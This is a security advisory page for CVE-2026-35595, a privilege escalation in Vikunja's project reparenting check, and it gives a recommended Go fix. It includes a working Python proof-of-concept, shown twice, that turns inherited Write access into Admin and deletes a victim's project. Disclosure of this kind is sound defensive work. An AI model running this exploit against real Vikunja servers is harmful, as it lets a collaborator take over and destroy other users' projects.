GHSA-2VQ4-854F-5C72

Vulnerability from github – Published: 2026-04-10 15:33 – Updated: 2026-04-10 19:36
VLAI?
Summary
Vikunja vulnerable to Privilege Escalation via Project Reparenting
Details

Summary

A user with Write-level access to a project can escalate their permissions to Admin by moving the project under a project they own. After reparenting, the recursive permission CTE resolves ownership of the new parent as Admin on the moved project. The attacker can then delete the project, manage shares, and remove other users' access.

Details

The CanUpdate check at pkg/models/project_permissions.go:139-148 only requires CanWrite on the new parent project when changing parent_project_id. However, Vikunja's permission model uses a recursive CTE that walks up the project hierarchy to compute permissions. Moving a project under a different parent changes the permission inheritance chain.

When a user has inherited Write access (from a parent project share) and reparents the child project under their own project tree, the CTE resolves their ownership of the new parent as Admin (permission level 2) on the moved project.

if p.ParentProjectID != 0 && p.ParentProjectID != ol.ParentProjectID {
    newProject := &Project{ID: p.ParentProjectID}
    can, err := newProject.CanWrite(s, a)  // Only checks Write, not Admin
    if err != nil {
        return false, err
    }
    if !can {
        return false, ErrGenericForbidden{}
    }
}

Proof of Concept

Tested on Vikunja v2.2.2.

1. victim creates "Parent Project" (id=3)
2. victim creates "Secret Child" (id=4) under Parent Project
3. victim shares Parent Project with attacker at Write level (permission=1)
   -> attacker inherits Write on Secret Child (no direct share)
4. attacker creates own "Attacker Root" project (id=5)
5. attacker verifies: DELETE /api/v1/projects/4 -> 403 Forbidden
6. attacker sends: POST /api/v1/projects/4 {"title":"Secret Child","parent_project_id":5}
   -> 200 OK (reparenting succeeds, only requires Write)
7. attacker sends: DELETE /api/v1/projects/4 -> 200 OK
   -> Project deleted. victim gets 404.

import requests                                                                                                                                                                                                                                                                                                    

TARGET = "http://localhost:3456"                                                                                                                                                                                                                                                                                 
API = f"{TARGET}/api/v1"  

def login(u, p):                     
    return requests.post(f"{API}/login", json={"username": u, "password": p}).json()["token"]

def h(token):  
    return {"Authorization": f"Bearer {token}", "Content-Type": "application/json"}

victim_token = login("victim", "Victim123!")
attacker_token = login("attacker", "Attacker123!")                                                                                                                                                                                                                                                                 

# victim creates parent -> child project hierarchy                                                                                                                                                                                                                                                               
parent = requests.put(f"{API}/projects", headers=h(victim_token),
                    json={"title": "Parent Project"}).json()
child = requests.put(f"{API}/projects", headers=h(victim_token),
                    json={"title": "Secret Child", "parent_project_id": parent["id"]}).json()

# victim shares parent with attacker at Write (attacker inherits Write on child)
requests.put(f"{API}/projects/{parent['id']}/users", headers=h(victim_token),
            json={"username": "attacker", "permission": 1})

# attacker creates own root project
own = requests.put(f"{API}/projects", headers=h(attacker_token),
                    json={"title": "Attacker Root"}).json()

# before: attacker cannot delete child
r = requests.delete(f"{API}/projects/{child['id']}", headers=h(attacker_token))
print(f"DELETE before reparent: {r.status_code}")  # 403

# exploit: reparent child under attacker's project
r = requests.post(f"{API}/projects/{child['id']}", headers=h(attacker_token),
                json={"title": "Secret Child", "parent_project_id": own["id"]})
print(f"Reparent: {r.status_code}")  # 200

# after: attacker can now delete child
r = requests.delete(f"{API}/projects/{child['id']}", headers=h(attacker_token))
print(f"DELETE after reparent: {r.status_code}")  # 200 - escalated to Admin

# victim lost access
r = requests.get(f"{API}/projects/{child['id']}", headers=h(victim_token))
print(f"Victim access: {r.status_code}")  # 404 - project gone

Output:

DELETE before reparent: 403
Reparent: 200
DELETE after reparent: 200
Victim access: 404

The attacker escalated from inherited Write to Admin by reparenting, then deleted the victim's project.

Impact

Any user with Write permission on a shared project can escalate to full Admin by moving the project under their own project tree via a single API call. After escalation, the attacker can delete the project (destroying all tasks, attachments, and history), remove other users' access, and manage sharing settings. This affects any project where Write access has been shared with collaborators.

Recommended Fix

Require Admin permission instead of Write when changing parent_project_id:

if p.ParentProjectID != 0 && p.ParentProjectID != ol.ParentProjectID {
    newProject := &Project{ID: p.ParentProjectID}
    can, err := newProject.IsAdmin(s, a)
    if err != nil {
        return false, err
    }
    if !can {
        return false, ErrGenericForbidden{}
    }
    canAdmin, err := p.IsAdmin(s, a)
    if err != nil {
        return false, err
    }
    if !canAdmin {
        return false, ErrGenericForbidden{}
    }
}

Found and reported by aisafe.io

Severity ?
8.3 (High)
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L
Show details on source website
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.2.2"
      },
      "package": {
        "ecosystem": "Go",
        "name": "code.vikunja.io/api"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.3.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-35595"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-269"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-10T15:33:50Z",
    "nvd_published_at": "2026-04-10T17:17:02Z",
    "severity": "HIGH"
  },
  "details": "## Summary\n\nA user with Write-level access to a project can escalate their permissions to Admin by moving the project under a project they own. After reparenting, the recursive permission CTE resolves ownership of the new parent as Admin on the moved project. The attacker can then delete the project, manage shares, and remove other users\u0027 access.\n\n## Details\n\nThe `CanUpdate` check at `pkg/models/project_permissions.go:139-148` only requires `CanWrite` on the new parent project when changing `parent_project_id`. However, Vikunja\u0027s permission model uses a recursive CTE that walks up the project hierarchy to compute permissions. Moving a project under a different parent changes the permission inheritance chain.\n\nWhen a user has inherited Write access (from a parent project share) and reparents the child project under their own project tree, the CTE resolves their ownership of the new parent as Admin (permission level 2) on the moved project.\n\n```go\nif p.ParentProjectID != 0 \u0026\u0026 p.ParentProjectID != ol.ParentProjectID {\n    newProject := \u0026Project{ID: p.ParentProjectID}\n    can, err := newProject.CanWrite(s, a)  // Only checks Write, not Admin\n    if err != nil {\n        return false, err\n    }\n    if !can {\n        return false, ErrGenericForbidden{}\n    }\n}\n```\n\n## Proof of Concept\n\nTested on Vikunja v2.2.2.\n\n```\n1. victim creates \"Parent Project\" (id=3)\n2. victim creates \"Secret Child\" (id=4) under Parent Project\n3. victim shares Parent Project with attacker at Write level (permission=1)\n   -\u003e attacker inherits Write on Secret Child (no direct share)\n4. attacker creates own \"Attacker Root\" project (id=5)\n5. attacker verifies: DELETE /api/v1/projects/4 -\u003e 403 Forbidden\n6. attacker sends: POST /api/v1/projects/4 {\"title\":\"Secret Child\",\"parent_project_id\":5}\n   -\u003e 200 OK (reparenting succeeds, only requires Write)\n7. attacker sends: DELETE /api/v1/projects/4 -\u003e 200 OK\n   -\u003e Project deleted. victim gets 404.\n```\n\n```python                                                                                                                                                                                                                                                                                                        \nimport requests                                                                                                                                                                                                                                                                                                    \n                                                                                                                                                                                                                                                                                                                \nTARGET = \"http://localhost:3456\"                                                                                                                                                                                                                                                                                 \nAPI = f\"{TARGET}/api/v1\"  \n                                        \ndef login(u, p):                     \n    return requests.post(f\"{API}/login\", json={\"username\": u, \"password\": p}).json()[\"token\"]\n                                        \ndef h(token):  \n    return {\"Authorization\": f\"Bearer {token}\", \"Content-Type\": \"application/json\"}\n                                                                                                                                                                                                                                                                                                                    \nvictim_token = login(\"victim\", \"Victim123!\")\nattacker_token = login(\"attacker\", \"Attacker123!\")                                                                                                                                                                                                                                                                 \n                                                                                                                                                                                                                                                                                                                \n# victim creates parent -\u003e child project hierarchy                                                                                                                                                                                                                                                               \nparent = requests.put(f\"{API}/projects\", headers=h(victim_token),\n                    json={\"title\": \"Parent Project\"}).json()\nchild = requests.put(f\"{API}/projects\", headers=h(victim_token),\n                    json={\"title\": \"Secret Child\", \"parent_project_id\": parent[\"id\"]}).json()\n\n# victim shares parent with attacker at Write (attacker inherits Write on child)\nrequests.put(f\"{API}/projects/{parent[\u0027id\u0027]}/users\", headers=h(victim_token),\n            json={\"username\": \"attacker\", \"permission\": 1})\n\n# attacker creates own root project\nown = requests.put(f\"{API}/projects\", headers=h(attacker_token),\n                    json={\"title\": \"Attacker Root\"}).json()\n\n# before: attacker cannot delete child\nr = requests.delete(f\"{API}/projects/{child[\u0027id\u0027]}\", headers=h(attacker_token))\nprint(f\"DELETE before reparent: {r.status_code}\")  # 403\n\n# exploit: reparent child under attacker\u0027s project\nr = requests.post(f\"{API}/projects/{child[\u0027id\u0027]}\", headers=h(attacker_token),\n                json={\"title\": \"Secret Child\", \"parent_project_id\": own[\"id\"]})\nprint(f\"Reparent: {r.status_code}\")  # 200\n\n# after: attacker can now delete child\nr = requests.delete(f\"{API}/projects/{child[\u0027id\u0027]}\", headers=h(attacker_token))\nprint(f\"DELETE after reparent: {r.status_code}\")  # 200 - escalated to Admin\n\n# victim lost access\nr = requests.get(f\"{API}/projects/{child[\u0027id\u0027]}\", headers=h(victim_token))\nprint(f\"Victim access: {r.status_code}\")  # 404 - project gone\n```\n\nOutput:\n```\nDELETE before reparent: 403\nReparent: 200\nDELETE after reparent: 200\nVictim access: 404\n```\n\nThe attacker escalated from inherited Write to Admin by reparenting, then deleted the victim\u0027s project.\n\n## Impact\n\nAny user with Write permission on a shared project can escalate to full Admin by moving the project under their own project tree via a single API call. After escalation, the attacker can delete the project (destroying all tasks, attachments, and history), remove other users\u0027 access, and manage sharing settings. This affects any project where Write access has been shared with collaborators.\n\n## Recommended Fix\n\nRequire Admin permission instead of Write when changing `parent_project_id`:\n\n```go\nif p.ParentProjectID != 0 \u0026\u0026 p.ParentProjectID != ol.ParentProjectID {\n    newProject := \u0026Project{ID: p.ParentProjectID}\n    can, err := newProject.IsAdmin(s, a)\n    if err != nil {\n        return false, err\n    }\n    if !can {\n        return false, ErrGenericForbidden{}\n    }\n    canAdmin, err := p.IsAdmin(s, a)\n    if err != nil {\n        return false, err\n    }\n    if !canAdmin {\n        return false, ErrGenericForbidden{}\n    }\n}\n```\n\n---\n*Found and reported by [aisafe.io](https://aisafe.io)*",
  "id": "GHSA-2vq4-854f-5c72",
  "modified": "2026-04-10T19:36:15Z",
  "published": "2026-04-10T15:33:50Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/go-vikunja/vikunja/security/advisories/GHSA-2vq4-854f-5c72"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35595"
    },
    {
      "type": "WEB",
      "url": "https://github.com/go-vikunja/vikunja/pull/2583"
    },
    {
      "type": "WEB",
      "url": "https://github.com/go-vikunja/vikunja/commit/c03d682f48aff890eeb3c8b41d38226069722827"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/go-vikunja/vikunja"
    },
    {
      "type": "WEB",
      "url": "https://github.com/go-vikunja/vikunja/releases/tag/v2.3.0"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Vikunja vulnerable to Privilege Escalation via Project Reparenting"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.